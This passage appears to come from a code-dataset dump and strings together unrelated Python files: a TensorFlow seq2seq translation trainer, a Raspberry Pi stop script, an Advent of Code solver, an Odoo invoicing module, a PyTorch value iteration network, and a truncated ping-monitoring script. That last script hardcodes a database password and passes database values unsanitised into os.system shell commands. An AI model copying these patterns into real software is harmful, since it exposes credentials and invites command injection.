Replicate encodings for each element in the batch\r\n batch_size = tf.shape(lengths)[0]\r\n pe_batch = tf.tile([pe_slice], [batch_size, 1, 1])\r\n\r\n # Mask out positions that are padded\r\n positions_mask = tf.sequence_mask(\r\n lengths=lengths, maxlen=maxlen, dtype=tf.float32)\r\n positions_embed = pe_batch * tf.expand_dims(positions_mask, 2)\r\n\r\n return positions_embed\r\n\r\n\r\n# CNN layer\r\ndef conv1d_weightnorm(inputs, layer_idx, out_dim, kernel_size, padding=\"SAME\", dropout=1.0, var_scope_name=\"conv_layer\"): # NOTE: the padding mode here needs attention\r\n with tf.variable_scope(\"conv_layer_\"+str(layer_idx)):\r\n in_dim = int(inputs.get_shape()[-1])\r\n V = tf.get_variable('V', shape=[kernel_size, in_dim, out_dim], dtype=tf.float32, initializer=tf.random_normal_initializer(mean=0, stddev=tf.sqrt(4.0*dropout/(kernel_size*in_dim))), trainable=True)\r\n V_norm = tf.norm(V.initialized_value(), axis=[0,1]) # V shape is M*N*k, V_norm shape is k \r\n g = tf.get_variable('g', dtype=tf.float32, initializer=V_norm, trainable=True)\r\n b = tf.get_variable('b', shape=[out_dim], dtype=tf.float32, initializer=tf.zeros_initializer(), trainable=True)\r\n \r\n # use weight normalization (Salimans & Kingma, 2016)\r\n W = tf.reshape(g, [1,1,out_dim])*tf.nn.l2_normalize(V,[0,1])\r\n inputs = tf.nn.bias_add(tf.nn.conv1d(value=inputs, filters=W, stride=1, padding=padding), b) \r\n return inputs\r\n\r\n# widen the layer before it enters the CNN so the output shape does not change and all of the data is kept\r\ndef linear_mapping_weightnorm(inputs, out_dim, in_dim=None, dropout=1.0, var_scope_name=\"linear_mapping\"):\r\n with tf.variable_scope(var_scope_name):\r\n input_shape = inputs.get_shape().as_list() # 
static shape. may has None\r\n input_shape_tensor = tf.shape(inputs) \r\n # use weight normalization (Salimans & Kingma, 2016) w = g* v/2-norm(v)\r\n V = tf.get_variable('V', shape=[int(input_shape[-1]), out_dim], dtype=tf.float32, initializer=tf.random_normal_initializer(mean=0, stddev=tf.sqrt(dropout*1.0/int(input_shape[-1]))), trainable=True)\r\n V_norm = tf.norm(V.initialized_value(), axis=0) # V shape is M*N, V_norm shape is N\r\n g = tf.get_variable('g', dtype=tf.float32, initializer=V_norm, trainable=True)\r\n b = tf.get_variable('b', shape=[out_dim], dtype=tf.float32, initializer=tf.zeros_initializer(), trainable=True) # weightnorm bias is init zero\r\n \r\n assert len(input_shape) == 3\r\n inputs = tf.reshape(inputs, [-1, input_shape[-1]])\r\n inputs = tf.matmul(inputs, V)\r\n inputs = tf.reshape(inputs, [input_shape_tensor[0], -1, out_dim])\r\n #inputs = tf.matmul(inputs, V) # x*v\r\n \r\n scaler = tf.div(g, tf.norm(V, axis=0)) # g/2-norm(v)\r\n inputs = tf.reshape(scaler,[1, out_dim])*inputs + tf.reshape(b,[1, out_dim]) # x*v g/2-norm(v) + b\r\n \r\n\r\n return inputs \r\n\r\ndef position_encoding(inputs):\r\n T = tf.shape(inputs)[1]\r\n repr_dim = inputs.get_shape()[-1].value\r\n pos = tf.reshape(tf.range(0.0, tf.to_float(T), dtype=tf.float32), [-1, 1])\r\n i = np.arange(0, repr_dim, 2, np.float32)\r\n denom = np.reshape(np.power(10000.0, i / repr_dim), [1, -1])\r\n enc = tf.expand_dims(tf.concat([tf.sin(pos / denom), tf.cos(pos / denom)], 1), 0)\r\n return tf.tile(enc, [tf.shape(inputs)[0], 1, 1])\r\n\r\ndef layer_norm(inputs, epsilon=1e-8):\r\n mean, variance = tf.nn.moments(inputs, [-1], keep_dims=True)\r\n normalized = (inputs - mean) / (tf.sqrt(variance + epsilon))\r\n params_shape = inputs.get_shape()[-1:]\r\n gamma = tf.get_variable('gamma', params_shape, tf.float32, tf.ones_initializer())\r\n beta = tf.get_variable('beta', params_shape, tf.float32, tf.zeros_initializer())\r\n return gamma * normalized + beta\r\n\r\n\r\ndef cnn_block(x, dilation_rate, pad_sz, hidden_dim, kernel_size):\r\n x = layer_norm(x)\r\n pad = tf.zeros([tf.shape(x)[0], pad_sz, hidden_dim])\r\n x = tf.layers.conv1d(inputs = tf.concat([pad, x, pad], 1),\r\n filters = hidden_dim,\r\n kernel_size = kernel_size,\r\n dilation_rate = dilation_rate)\r\n x = x[:, :-pad_sz, :]\r\n x = tf.nn.relu(x)\r\n return x\r\n# GLU \r\ndef gated_linear_units(inputs):\r\n input_shape = inputs.get_shape().as_list()\r\n assert len(input_shape) == 3\r\n input_pass = inputs[:,:,0:int(input_shape[2]/2)]\r\n input_gate = inputs[:,:,int(input_shape[2]/2):]\r\n input_gate = tf.sigmoid(input_gate)\r\n return tf.multiply(input_pass, input_gate)\r\n\r\n# Model for Machine Translation\r\nclass Seq2SeqModel(object):\r\n def __init__(self,vocab_size_en, vocab_size_vi, word_embedding_en, word_embedding_vi, input_len, output_len, params, train=True):\r\n # Get the vocab size\r\n self.vocab_size_en=vocab_size_en\r\n self.vocab_size_vi=vocab_size_vi \r\n \r\n # Get hyper-parameters from params \r\n self.num_layers=params['num_layers']\r\n self.num_hiddens=params['num_hiddens'] \r\n self.learning_rate = params['learning_rate']\r\n self.keep_prob = params['keep_prob']\r\n self.beam_width = params['beam_width']\r\n \r\n self.kernel_size = params['kernel_size']\r\n # Using BasicLSTMCell as a cell unit\r\n self.cell=tf.nn.rnn_cell.LSTMCell \r\n \r\n # Define Place holders for the model\r\n self.batch_size=tf.placeholder(tf.int32,(),name=\"batch_size\")\r\n self.global_step = tf.Variable(0, trainable=False) # False means not adding the variable 
to the graph collection \r\n \r\n # place holders for encoder\r\n self.inputSeq=tf.placeholder(tf.int32,[None,input_len])\r\n self.inputSeq_len=tf.placeholder(tf.int32, [None]) # Need to define the Shape as required in tf.contrib.seq2seq.tile_batch\r\n \r\n # place holders for decoder\r\n self.decoder_input=tf.placeholder(tf.int32,[None,output_len])\r\n self.decoder_len=tf.placeholder(tf.int32, [None])\r\n self.decoder_target=tf.placeholder(tf.int32,[None,output_len])\r\n \r\n # Define projection_layer\r\n self.projection_layer = tf.layers.Dense(self.vocab_size_vi, use_bias=False)\r\n \r\n # Define the Embedding layer\r\n with tf.name_scope(\"embedding\"):\r\n self.embeddings_en=tf.get_variable(\"embeddings_en\",initializer=tf.constant(word_embedding_en,dtype=tf.float32))\r\n self.embeddings_vi=tf.get_variable(\"embeddings_vi\",initializer=tf.constant(word_embedding_vi,dtype=tf.float32))\r\n \r\n # map the int value with its embeddings\r\n input_emb=tf.nn.embedding_lookup(self.embeddings_en,self.inputSeq)\r\n decoder_input_emb=tf.nn.embedding_lookup(self.embeddings_vi,self.decoder_input)\r\n\r\n \r\n #layer = 0\r\n input_emb += position_encoding(input_emb)\r\n for i in range(self.num_layers): \r\n next_layer = input_emb\r\n dilation_rate = 2 ** i\r\n pad_sz = (self.kernel_size - 1) * dilation_rate \r\n with tf.variable_scope('block_%d'%i,reuse=tf.AUTO_REUSE):\r\n #input_emb += cnn_block(input_emb, dilation_rate, \r\n # pad_sz, 100, self.kernel_size)\r\n #layer += gated_linear_units(input_emb)\r\n next_layer = conv1d_weightnorm(inputs=next_layer, layer_idx=i, out_dim=100*2, kernel_size=self.kernel_size, padding=\"SAME\", dropout=0.9, var_scope_name=\"conv_layer_\"+str(i))\r\n next_layer = gated_linear_units(next_layer)\r\n input_emb = (next_layer + input_emb) * tf.sqrt(0.5)\r\n #input_emb = gated_linear_units(input_emb)\r\n\r\n #input_emb = layer\r\n #print(\"emb: \",input_emb) \r\n '''\r\n print(\"emb1: \", input_emb)\r\n #CNN encoder\r\n input_emb += position_encoding(input_emb)\r\n \r\n for i in range(self.num_layers): \r\n next_layer = input_emb\r\n dilation_rate = 2 ** i\r\n pad_sz = (self.kernel_size - 1) * dilation_rate \r\n with tf.variable_scope('block',reuse=tf.AUTO_REUSE):\r\n next_layer = conv1d_weightnorm(inputs=next_layer, layer_idx=i, out_dim=100*2, kernel_size=self.kernel_size, padding=\"SAME\", dropout=0.9, var_scope_name=\"conv_layer_\"+str(i))\r\n next_layer = gated_linear_units(next_layer)\r\n input_emb = (next_layer + input_emb) * tf.sqrt(0.5)\r\n\r\n print(\"ebm2: \", input_emb)\r\n '''\r\n\r\n\r\n\r\n # Convert from batch_size*seq_len*embedding to seq_len*batch_size*embedding to feed data with timestep \r\n # But, we need to set time_major=True during Training\r\n self.encoder_inputEmb = tf.transpose(input_emb, perm=[1, 0, 2])\r\n self.decoder_inputEmb = tf.transpose(decoder_input_emb, perm=[1, 0, 2])\r\n\r\n \r\n \r\n # Define the Encoder\r\n with tf.name_scope(\"encoder\"): \r\n # Create RNN Cell for forward and backward direction\r\n fw_cells=list()\r\n bw_cells=list()\r\n for i in range(self.num_layers):\r\n fw_cell= self.cell(self.num_hiddens)\r\n bw_cell= self.cell(self.num_hiddens)\r\n \r\n # Add Dropout\r\n fw_cell=rnn.DropoutWrapper(fw_cell,output_keep_prob=self.keep_prob)\r\n bw_cell=rnn.DropoutWrapper(bw_cell,output_keep_prob=self.keep_prob)\r\n \r\n # Add cell to the list\r\n fw_cells.append(fw_cell)\r\n bw_cells.append(bw_cell)\r\n \r\n \r\n # Build a multi bi-directional model from fw_cells and bw_cells\r\n outputs, encoder_state_fw, encoder_state_bw = 
tf.contrib.rnn.stack_bidirectional_dynamic_rnn(\r\n cells_fw=fw_cells, cells_bw=bw_cells,inputs=self.encoder_inputEmb,time_major=True, sequence_length=self.inputSeq_len, dtype=tf.float32)\r\n \r\n # The ouput of Encoder (time major)\r\n self.encoder_outputs=outputs\r\n \r\n # Use the final state of the last layer as encoder_final_state \r\n encoder_state_c = tf.concat((encoder_state_fw[-1].c, encoder_state_bw[-1].c), 1)\r\n encoder_state_h = tf.concat((encoder_state_fw[-1].h, encoder_state_bw[-1].h), 1)\r\n self.encoder_final_state = rnn.LSTMStateTuple(c=encoder_state_c, h=encoder_state_h)\r\n \r\n # Define the Decoder for training\r\n with tf.name_scope(\"decoder\"):\r\n # Define Decoder cell\r\n decoder_num_hiddens =self.num_hiddens * 2 # As we use bi-directional RNN\r\n decoder_cell=self.cell(decoder_num_hiddens)\r\n \r\n # Training mode \r\n if(train):\r\n # Convert from time major to batch major \r\n attention_states = tf.transpose(self.encoder_outputs, [1, 0, 2])\r\n \r\n # Decoder with attention \r\n attention=tf.contrib.seq2seq.BahdanauAttention(num_units=decoder_num_hiddens, memory=attention_states, memory_sequence_length=self.inputSeq_len,normalize=True)\r\n attention_decoder_cell= tf.contrib.seq2seq.AttentionWrapper(cell=decoder_cell,attention_mechanism=attention,attention_layer_size=decoder_num_hiddens)\r\n\r\n # Use the final state of encoder as the initial state of the decoder\r\n decoder_initial_state = attention_decoder_cell.zero_state(dtype=tf.float32, batch_size=self.batch_size)\r\n decoder_initial_state = decoder_initial_state.clone(cell_state=self.encoder_final_state )\r\n\r\n # Use TrainingHelper to train the Model \r\n training_helper = tf.contrib.seq2seq.TrainingHelper(inputs=self.decoder_inputEmb,sequence_length=self.decoder_len, time_major=True)\r\n decoder = tf.contrib.seq2seq.BasicDecoder(cell=attention_decoder_cell,helper=training_helper,initial_state=decoder_initial_state,output_layer=self.projection_layer)\r\n logits, _, _ = tf.contrib.seq2seq.dynamic_decode(decoder, output_time_major=True,maximum_iterations=output_len)\r\n \r\n \r\n # Convert from time major to batch major \r\n self.training_logits = tf.transpose(logits.rnn_output, perm=[1, 0, 2])\r\n \r\n # Adding zero to make sure training_logits has shape: [batch_size, sequence_length, num_decoder_symbols]\r\n self.training_logits = tf.concat([self.training_logits, tf.zeros([self.batch_size, output_len - tf.shape(self.training_logits)[1], self.vocab_size_vi])], axis=1)\r\n \r\n # Inference mode \r\n else:\r\n # Using Beam search\r\n tiled_encoder_outputs = tf.contrib.seq2seq.tile_batch(tf.transpose(self.encoder_outputs, perm=[1, 0, 2]), multiplier=self.beam_width)\r\n tiled_encoder_final_state=tf.contrib.seq2seq.tile_batch(self.encoder_final_state, multiplier=self.beam_width)\r\n tiled_inputSeq_len=tf.contrib.seq2seq.tile_batch(self.inputSeq_len, multiplier=self.beam_width)\r\n\r\n # Decoder with attention with Beam search\r\n attention=tf.contrib.seq2seq.BahdanauAttention(num_units=decoder_num_hiddens, memory=tiled_encoder_outputs, memory_sequence_length=tiled_inputSeq_len,normalize=True)\r\n attention_decoder_cell= tf.contrib.seq2seq.AttentionWrapper(cell=decoder_cell,attention_mechanism=attention,attention_layer_size=decoder_num_hiddens)\r\n\r\n # Use the final state of encoder as the initial state of the decoder\r\n decoder_initial_state = attention_decoder_cell.zero_state(dtype=tf.float32, batch_size=self.batch_size * self.beam_width)\r\n decoder_initial_state = 
decoder_initial_state.clone(cell_state=tiled_encoder_final_state)\r\n\r\n # Build a Decoder with Beam Search\r\n beamSearch_decoder=tf.contrib.seq2seq.BeamSearchDecoder( \r\n cell=attention_decoder_cell,\r\n embedding=self.embeddings_vi,\r\n start_tokens=tf.fill([self.batch_size],tf.constant(2)), # 2 is the id of <s>\r\n end_token=tf.constant(3), # 3 is the id of </s>\r\n initial_state=decoder_initial_state,\r\n beam_width=self.beam_width,\r\n output_layer=self.projection_layer \r\n )\r\n\r\n # Perform dynamic decoding with beamSearch_decoder\r\n outputs, _ , _ =tf.contrib.seq2seq.dynamic_decode(decoder=beamSearch_decoder,maximum_iterations= output_len,output_time_major=True)\r\n \r\n # Convert from seq_len*batch_size*beam_width to batch_size*beam_width*seq_len\r\n outputs=tf.transpose(outputs.predicted_ids, perm=[1, 2, 0])\r\n \r\n # Take the first beam (best result) as Decoder output \r\n #self.decoder_outputs=outputs[:,0,:]\r\n self.decoder_outputs = outputs\r\n\r\n with tf.name_scope(\"optimization\"):\r\n # Used for Training mode only \r\n if(train):\r\n # Calculate loss value \r\n masks = tf.sequence_mask(lengths=self.decoder_len,maxlen=output_len, dtype=tf.float32) \r\n self.loss = tf.contrib.seq2seq.sequence_loss(logits=self.training_logits,targets=self.decoder_target,weights=masks)\r\n\r\n # Using AdamOptimizer\r\n optimizer = tf.train.AdamOptimizer(self.learning_rate)\r\n # Compute gradient \r\n gradients = optimizer.compute_gradients(self.loss)\r\n # Apply Gradient Clipping \r\n gradients_clipping = [(tf.clip_by_value(grad, clip_value_min=-1., clip_value_max=1.), var) for grad, var in gradients if grad is not None]\r\n\r\n # Apply gradients to variables\r\n self.train_update = optimizer.apply_gradients(gradients_clipping, global_step=self.global_step)\r\n #self.train_update = optimizer.apply_gradients(gradients, global_step=self.global_step)\r\n\r\n\r\n# Define hyper-parameters for the Model\r\nparams = dict()\r\nparams['num_layers'] = int(args[\"num_layers\"])\r\nparams['num_hiddens'] = int(args[\"num_hiddens\"])\r\nparams['learning_rate'] = float(args[\"learning_rate\"])\r\nparams['keep_prob'] = float(args[\"keep_prob\"])\r\nparams['beam_width'] = int(args[\"beam_width\"])\r\nparams['kernel_size'] = 3\r\nnum_epochs = 10\r\nearly_stop = 5 # Stop if there is no improvement after 5 epochs\r\nBATCH_SIZE = int(args[\"batch_size\"])\r\n\r\n# Set paths to save the model\r\ncheckpoint = args[\"checkpoint\"]\r\n\r\nstart_time = time.time()\r\n\r\ntf.reset_default_graph()\r\n\r\nwith tf.Session() as sess:\r\n # Create a Seq2seq model\r\n model = Seq2SeqModel(len(int2word_english), len(int2word_vietnamese), word_embed_english,\r\n word_embed_vietnamese, english_max_len, vietnamese_max_len, params)\r\n\r\n # Initialize all variables\r\n sess.run(tf.global_variables_initializer())\r\n min_loss = 1000 # To find the minimum loss during training\r\n no_impove_count = 0 # Count the number of consecutive epochs with no improvement\r\n\r\n # load checkpoint\r\n #saver = tf.train.Saver(tf.global_variables())\r\n #saver.restore(sess, checkpoint)\r\n\r\n for epoch in range(num_epochs):\r\n # Get batches from training data\r\n batches = get_batches(train_english_intSeq,\r\n train_vietnamese_intSeq, batch_size=BATCH_SIZE)\r\n\r\n # Reset epoch_loss after each epoch\r\n epoch_loss = 0\r\n # Iterate over batches\r\n for batch_i, (batch_x, batch_y) in enumerate(batches):\r\n # The actual length of each sequence in the batch (excluding \"<pad>\")\r\n batch_x_len = list(\r\n map(lambda seq: len([word_int for word_int in seq if word_int != 0]), 
batch_x))\r\n\r\n # Decoder input is created by adding <s> to the beginning of each output sentence\r\n batch_decoder_input = list(\r\n map(lambda seq: [word2int_vietnamese[\"<s>\"]] + list(seq), batch_y))\r\n\r\n # The actual length of each Decoder input (excluding \"<pad>\")\r\n batch_decoder_len = list(map(lambda seq: len(\r\n [word_int for word_int in seq if word_int != 0]), batch_decoder_input))\r\n\r\n # The actual output of the Decoder is created by adding </s> to the end of each output sentence\r\n batch_decoder_output = list(map(lambda seq: list(\r\n seq) + [word2int_vietnamese[\"</s>\"]], batch_y))\r\n\r\n # Add <pad> to make all input and output of Decoder have the same length\r\n batch_decoder_input = list(\r\n map(lambda seq: seq + (vietnamese_max_len - len(seq)) * [word2int_vietnamese[\"<pad>\"]], batch_decoder_input))\r\n batch_decoder_output = list(\r\n map(lambda seq: seq + (vietnamese_max_len - len(seq)) * [word2int_vietnamese[\"<pad>\"]], batch_decoder_output))\r\n\r\n # Create a train_feed_dict\r\n train_feed_dict = {\r\n model.batch_size: len(batch_x),\r\n model.inputSeq: batch_x,\r\n model.inputSeq_len: batch_x_len,\r\n\r\n model.decoder_input: batch_decoder_input,\r\n model.decoder_len: batch_decoder_len,\r\n model.decoder_target: batch_decoder_output\r\n }\r\n\r\n # Start training the model\r\n _, step, loss, encoder_outputs = sess.run(\r\n [model.train_update, model.global_step, model.loss, model.encoder_outputs], feed_dict=train_feed_dict)\r\n epoch_loss += loss\r\n\r\n # Display loss value of each step\r\n print(\"step {0}: loss = {1}\".format(step, loss))\r\n\r\n print(\"Finish epoch\", epoch+1)\r\n # Averaging the epoch_loss\r\n epoch_loss = epoch_loss/(batch_i+1)\r\n\r\n # Save the model if the epoch_loss is at a new minimum\r\n if epoch_loss <= min_loss:\r\n # Set new minimum loss\r\n min_loss = epoch_loss\r\n # Reset the no_impove_count\r\n no_impove_count = 0\r\n\r\n # Save the new model\r\n saver = tf.train.Saver(tf.global_variables())\r\n saver.save(sess, checkpoint)\r\n\r\n print('New model saved, minimum loss:', min_loss, '\\n')\r\n\r\n # Early stopping\r\n else:\r\n print(\"No Improvement!\", '\\n')\r\n no_impove_count += 1\r\n if(no_impove_count == early_stop):\r\n print(\"Early stopping... 
Finish training\")\r\n break\r\n\r\nend_time = time.time()\r\ntraining_time = (end_time-start_time)/60\r\nprint(\"\\nTraining time (mins): \", training_time)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":30471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"193351192","text":"import os\nimport time\nimport RPi.GPIO as GPIO\n\nGPIO.setwarnings(True)\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(13, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\ndef end_script(pin):\n print(\"stopping script\")\n os.system('killall arecord')\n os.system('killall aplay')\n\nGPIO.add_event_detect(13, GPIO.RISING, callback=end_script, bouncetime=10)\n\ntry:\n while True:\n time.sleep(50000)\nexcept KeyboardInterrupt:\n print('Goodbye')\n\nGPIO.remove_event_detect(13)\n","sub_path":"record/killer.py","file_name":"killer.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"75186695","text":"import re\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntestinput = \"\"\"\\\nx=495, y=2..7\ny=7, x=495..501\nx=501, y=3..7\nx=498, y=2..4\nx=506, y=1..2\nx=498, y=10..13\nx=504, y=10..13\ny=13, x=498..504\\\n\"\"\"\n\ndef plotme():\n global grid\n\n plt.spy(grid.T)\n plt.show()\n # plt.gca().invert_yaxis()\n\n# air . : 0\n# flowing water | : 1\n# standing water ~ : 2\n# clay # : 3\n\nAIR = 0\nWATERF = 1\nWATERS = 2\nCLAY = 3\n\nrex = re.compile(r\"x=[0-9.]*\")\nrey = re.compile(r\"y=[0-9.]*\")\n\nspring_location = (500, 0) # at top of area\n\nclay_x = []\nclay_y = []\nfor line in testinput.splitlines():\n print(line)\n xinput = re.findall(rex, line)[0]\n yinput = re.findall(rey, line)[0]\n # .. either in x or y, never both or neither\n if \"..\" in xinput:\n xinput = xinput.split(\"..\")\n x = list(range(int(xinput[0][2:]), int(xinput[1])+1))\n y = [int(yinput[2:])] * len(x)\n else:\n yinput = yinput.split(\"..\")\n y = list(range(int(yinput[0][2:]), int(yinput[1])+1))\n x = [int(xinput[2:])] * len(y)\n clay_x.extend(x)\n clay_y.extend(y)\n\nmin_x = min(clay_x)\nmax_x = max(clay_x)\nmin_y = min(clay_y)\nmax_y = max(clay_y)\n\ngrid = np.zeros([max_x-min_x+3, max_y + 1],dtype=int)\n\nassert len(clay_x) == len(clay_y)\nfor n in range(len(clay_x)):\n grid[clay_x[n]-min_x+1, clay_y[n]] = 3\nprint(clay_x)\nprint(grid)\n\ngrid[spring_location[0]-min_x+1, spring_location[1]] = 1\n\nwhile True:\n old_grid = grid.copy()\n\n for x in range(grid.shape[0]):\n for y in range(grid.shape[1]):\n if grid[x,y] == WATERF:\n if y+1 < grid.shape[1]:\n # Check the cell below before writing to it; overwriting first made the clay test unreachable\n if grid[x,y+1] == CLAY:\n grid[x,y] = WATERS\n else:\n grid[x,y+1] = WATERF\n\n print(\"---\")\n print(grid.T)\n if np.all(old_grid == grid):\n break\n \n","sub_path":"day17_reservoirresearchp.py","file_name":"day17_reservoirresearchp.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"206633613","text":"from odoo import models, api, _\nfrom odoo.exceptions import UserError\nfrom odoo.tools import float_is_zero\nclass SaleOrderLine(models.Model):\n _inherit = 'stock.move'\n \n @api.multi\n def _prepare_invoice_line(self, invoices, qty, position):\n\n self.ensure_one()\n res = {}\n account = self.product_id.property_account_income_id or self.product_id.categ_id.property_account_income_categ_id\n if not account:\n raise UserError(_('Please define income account for this product: \"%s\" (id:%d) - or for its category: \"%s\".') % \n 
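The day-17 solver above advances the water grid one full sweep at a time and stops once a sweep leaves the grid unchanged. A minimal sketch of that fixed-point pattern factored into a reusable helper; the toy `fall` rule and the tiny 5x3 world below are illustrative stand-ins, not the puzzle's real flow rules:

import numpy as np

def iterate_to_fixed_point(grid, step, max_iters=10_000):
    # Apply `step` repeatedly until a full sweep leaves the grid unchanged.
    for _ in range(max_iters):
        old = grid.copy()
        grid = step(grid)
        if np.array_equal(old, grid):
            return grid
    raise RuntimeError("no fixed point reached within max_iters")

def fall(g):
    # Toy rule: flowing water (1) spreads one cell down into air (0) per sweep.
    g = g.copy()
    for y, x in zip(*np.nonzero(g == 1)):
        if y + 1 < g.shape[0] and g[y + 1, x] == 0:
            g[y + 1, x] = 1
    return g

world = np.zeros((5, 3), dtype=int)
world[0, 1] = 1   # a drop of flowing water at the top
world[4, 1] = 3   # a clay floor it can never enter
print(iterate_to_fixed_point(world, fall))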
(self.product_id.name, self.product_id.id, self.product_id.categ_id.name))\n sale_line_id = self.procurement_id.sale_line_id\n fpos = sale_line_id.order_id.fiscal_position_id or sale_line_id.order_id.partner_id.property_account_position_id\n if fpos:\n account = fpos.map_account(account)\n \n res = {\n 'name': sale_line_id.name,\n 'origin': sale_line_id.order_id.client_order_ref, # sale_line_id.order_id.name\n 'account_id': account.id,\n 'price_unit': sale_line_id.price_unit,\n 'quantity': qty,\n 'move_id':self.id,\n 'position':position,\n 'discount': sale_line_id.discount,\n 'uom_id': sale_line_id.product_uom.id,\n 'product_id': self.product_id.id or False,\n 'layout_category_id': sale_line_id.layout_category_id and sale_line_id.layout_category_id.id or False,\n 'invoice_line_tax_ids': [(6, 0, sale_line_id.tax_id.ids)],\n 'account_analytic_id': sale_line_id.order_id.project_id.id,\n 'analytic_tag_ids': [(6, 0, sale_line_id.analytic_tag_ids.ids)],\n }\n return res\n\n \n @api.multi\n def invoice_line_create(self, invoice_id, qty, position, sequence):\n \"\"\"\n Create an invoice line. The quantity to invoice can be positive (invoice) or negative\n (refund).\n\n :param invoice_id: integer\n :param qty: float quantity to invoice\n \"\"\"\n self.ensure_one()\n precision = self.env['decimal.precision'].precision_get('Product Unit of Measure')\n invoice_line_id = False\n if not float_is_zero(qty, precision_digits=precision):\n vals = self._prepare_invoice_line(invoice_id, qty, position)\n vals.update({'invoice_id': invoice_id, 'sequence': sequence, 'sale_line_ids': [(6, 0, [self.procurement_id.sale_line_id.id])]})\n invoice_line_id = self.env['account.invoice.line'].create(vals)\n \n return invoice_line_id\n \n","sub_path":"invoice_based_on_delivery_ept/models/stock_move.py","file_name":"stock_move.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"174267914","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.parameter import Parameter\nimport numpy as np\nnp.random.seed(0)\n\n\nclass VIN(nn.Module):\n def __init__(self, args):\n super(VIN, self).__init__()\n self.args = args\n self.ly_hidden = nn.Conv2d(in_channels=args.num_input, out_channels=args.num_hidden,\n kernel_size=(3, 3), stride=1, padding=1, bias=True)\n self.ly_reward = nn.Conv2d(in_channels=args.num_hidden, out_channels=1,\n kernel_size=(3, 3), stride=1, padding=1, bias=False)\n self.ly_q_value = nn.Conv2d(in_channels=1, out_channels=args.num_qlayer,\n kernel_size=(3, 3), stride=1, padding=1, bias=False)\n self.fc = nn.Linear(in_features=args.num_qlayer,\n out_features=8, bias=False)\n self.weight_v_value = Parameter(torch.zeros(\n args.num_qlayer, 1, 3, 3), requires_grad=True)\n self.sm = nn.Softmax(dim=1)\n\n # params\n self.reward_image = None\n self.v_value_image = None\n\n def eval_q_value(self, r, v):\n return F.conv2d(\n input=torch.cat([r, v], 1),\n weight=torch.cat(\n [self.ly_q_value.weight, self.weight_v_value], 1),\n stride=1, padding=1)\n\n def forward(self, input_view, state_x, state_y, num_vi, visualize=False):\n # intermediate output\n hidden = self.ly_hidden(input_view)\n\n # get reward\n reward = self.ly_reward(hidden)\n\n # get initial q value from reward\n q_value = self.ly_q_value(reward)\n\n # get v value\n v_value, _ = torch.max(q_value, dim=1, keepdim=True)\n\n if visualize is True:\n self.reward_image = reward.data.cpu().numpy().reshape(\n self.args.dom_size, 
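The `invoice_line_create` method above guards against creating invoice lines for a zero quantity with Odoo's `float_is_zero` helper, so a stray 1e-7 delivered quantity never becomes an empty line. A rough standalone approximation of what that check does, for readers without an Odoo environment (a simplified sketch, not Odoo's exact implementation):

def float_is_zero(value, precision_digits):
    # A float counts as zero when it rounds away at the given decimal precision.
    return abs(round(value, precision_digits)) < 10 ** (-precision_digits)

assert float_is_zero(0.0000001, precision_digits=3)    # vanishes at 3 digits
assert not float_is_zero(0.001, precision_digits=3)    # still significant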
self.args.dom_size)\n self.v_value_image = v_value.data.cpu().numpy().reshape(\n 1, self.args.dom_size, self.args.dom_size)\n\n # Update q and v values\n for i in range(num_vi - 1):\n q_value = self.eval_q_value(reward, v_value)\n v_value, _ = torch.max(q_value, dim=1, keepdim=True)\n if visualize is True:\n self.v_value_image = np.append(self.v_value_image, v_value.data.cpu(\n ).numpy().reshape(1, self.args.dom_size, self.args.dom_size), axis=0)\n\n q_value = self.eval_q_value(reward, v_value)\n\n batch_size, l_q, _, _ = q_value.size()\n\n qvalue_state_xy = q_value[torch.arange(batch_size), :, state_x.long(),\n state_y.long()].view(batch_size, l_q)\n\n # transform qvalue corresponding to current state into actions\n logits = self.fc(qvalue_state_xy)\n\n return logits, self.sm(logits)\n","sub_path":"src/model/vin.py","file_name":"vin.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"300006380","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n# github: https://github.com/houm01\n\n\nimport os\nimport smtplib\nimport datetime\nimport psycopg2\nfrom pypinyin import lazy_pinyin\nfrom email.utils import formataddr\nfrom email.mime.text import MIMEText\n\n# 定义一个邮件的列表\nmail_down_ip_body = []\n\n\n# 操作IP数据库,测试不通的设置为 is down\ndef ping_ip():\n # 用 os.system ping 太慢了,可以优化一下,使用 python 封装 icmp,并使用多线程\n conn = psycopg2.connect(dbname=\"houm01db\", user=\"postgres\", password=\"packet123\", host=\"10.20.99.105\", port=\"5432\")\n cursor = conn.cursor()\n\n # 操作前备份一下table,防止自己网络有问题,将所有ip都设为down状态了\n # cursor.execute(\"select china_edu from ip_test;\")\n # ip_list_edu = cursor.fetchall()\n # for i in ip_list_edu:\n # response = os.system('ping -c 8 ' + i[0])\n # if response == 0:\n # print(i[0], 'is up')\n # else:\n # print(i[0], 'is down')\n # cursor.execute(\"update ip_test set china_edu = 'is down' where china_edu = (%s) and china_edu != 'is down';\", (i[0],))\n # cursor.execute(\"select state, city from ip_test where china_edu = (%s);\",\n # (i[0],))\n # china_edu_down_name = cursor.fetchall()\n # for z in china_edu_down_name:\n # mail_down_ip_body.append(('教育网', z[0].rstrip() + z[1].rstrip(), i[0].rstrip()))\n\n # 为节省时间,这里就不合并到一起了\n cursor.execute(\"select china_unicom from ip_test;\")\n ip_list_unicom = cursor.fetchall()\n for i in ip_list_unicom:\n response = os.system('ping -c 8 ' + i[0])\n if response == 0:\n print(i[0], 'is up')\n else:\n print(i[0], 'is down')\n cursor.execute(\"select state, city from ip_test where china_unicom = (%s) and china_unicom != 'is down';\",\n (i[0],))\n china_unicom_down_name = cursor.fetchall()\n for z in china_unicom_down_name:\n mail_down_ip_body.append(('联通', z[0].rstrip() + 